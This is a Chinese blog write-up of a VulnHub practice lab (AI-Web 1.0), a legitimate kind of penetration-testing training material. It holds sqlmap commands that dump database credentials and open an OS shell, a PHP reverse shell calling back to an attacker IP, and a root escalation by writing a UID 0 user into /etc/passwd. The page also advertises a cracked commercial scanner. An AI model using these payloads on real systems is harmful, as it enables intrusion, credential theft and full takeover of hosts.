VulnHub之AIWeb1.0

最新推荐文章于 2024-06-18 15:15:05 发布
最新推荐文章于 2024-06-18 15:15:05 发布
阅读量224 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/106809351
版权


一个粗糙的信息收集

使用nmap探测目标主机开放端口

访问robots.txt

访问http://192.168.31.126/se3reTdir777/

猜测可能存在注入点,使用Sqlmap进行探测

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs


获取数据库中的表

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables


获取systemUser表中的字段名

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns

获取字段内容

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser -C "userName,password" --dump


获取user表中内容

在数据库中没有获得有价值的信息
扫一下网站目录,找到一个info.php

访问页面发现是phpinfo

找到网站的物理路径

使用sqlmap获取shell

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
# 网站路径
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/


查看/etc/passwd权限,发现可以写入

使用卡里自带的openssl加密一下我们自己的账户

写入用户,UID,GID为0,根目录为root

尝试切换到test用户时提示需要一个终端

在本地写一个后门,使用wget下载的靶机

<?php
$sock=fsockopen("192.168.126.233",9966);
exec("/bin/sh -i <&3 >&3 2>&3");
?>


使用python搭建一个HTTP服务器

python -m SimpleHTTPServer 8080


使用wget下载到靶机

执行刚刚上传的文件

看到反弹回来一个shell

使用python创建一个交互式shell

切换用户,查看权限已经是root用户

查看flag

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1603
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
VulnHub_AI_Web_1.0
qq_45434762的博客
03-28 259
一个粗糙的信息收集 使用nmap探测目标主机开放端口 访问robots.txt 访问http://192.168.31.126/se3reTdir777/ 猜测可能存在注入点,使用Sqlmap进行探测 sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs 获取数...
Vulnhub——AI: WEB: 1
最新发布
流水不争先,争的是滔滔不绝
06-18 610
(1)OS-shell,Openssl的利用(2)Linux /etc/passwd文件写入root用户进行提权
vulnhub靶场AI-WEB-1.0
qq_42307546的博客
05-03 604
靶机下载地址 https://download.vulnhub.com/aiweb/AI-Web-1.0.7z 主机探测 netdiscover -i eth0 -r 192.168.1.0/24 端口探测 nmap -p 1-65535 -sC -sV 192.168.1.14 开启了80端口访问 web目录爆破 gobuster dir -u http://192.168.1.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-m
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4184
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1390
vulnhub靶机AI-Web-1.0渗透笔记
信息安全_.第六期.CTF.WebVulnhub靶场.课件资料.pptx
08-14
总的来说,这门课程旨在通过Vulnhub靶场实战和CTF竞赛经验分享,帮助学习者深入理解Web安全,掌握渗透测试的基本技术和策略,同时也激发对网络安全的兴趣和热情。无论是为了提升技能,还是参加竞赛,都能从中学到...
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场库中 DC:1
07-06
- **主机发现**:使用nmap工具扫描同一网段(192.168.1.0/24)的活跃主机,识别出可疑靶机IP为192.168.1.102。 - **端口和服务识别**:进一步使用nmap进行深度扫描,识别出192.168.1.102上开放的端口(80、22、111...
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2496
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2866
AI-WEB-1.0 多方法渗透
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 304
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 508
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6251
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
VulnHub系列】AI-Web-1 漏洞提权
初学者L_言的博客
07-12 664
一、环境 靶机: https://www.vulnhub.com/entry/ai-web-1,353/ 攻击机: kali 二、具体步骤 2.1 主机发现 nmap -sP ip段 2.2 端口服务扫描 nmap -sV -A -p- 192.168.47.152 Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd | http-robots.txt: 2 disal
Vulnhub靶机:AI-WEB-1.0
weixin_68416970的博客
05-22 984
Vulnhub靶机:AI-WEB-1.0AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1186
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
Python操作MySQL数据库与Vulnhub靶场提权教程
上述场景可能属于Vulnhub中的一系列渗透测试练习之一,帮助学习者理解如何在实际环境中发现和利用漏洞。 这个教程结合了Python数据库操作与安全渗透测试的实战技巧,旨在提升用户对数据库交互的理解以及在安全场景...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值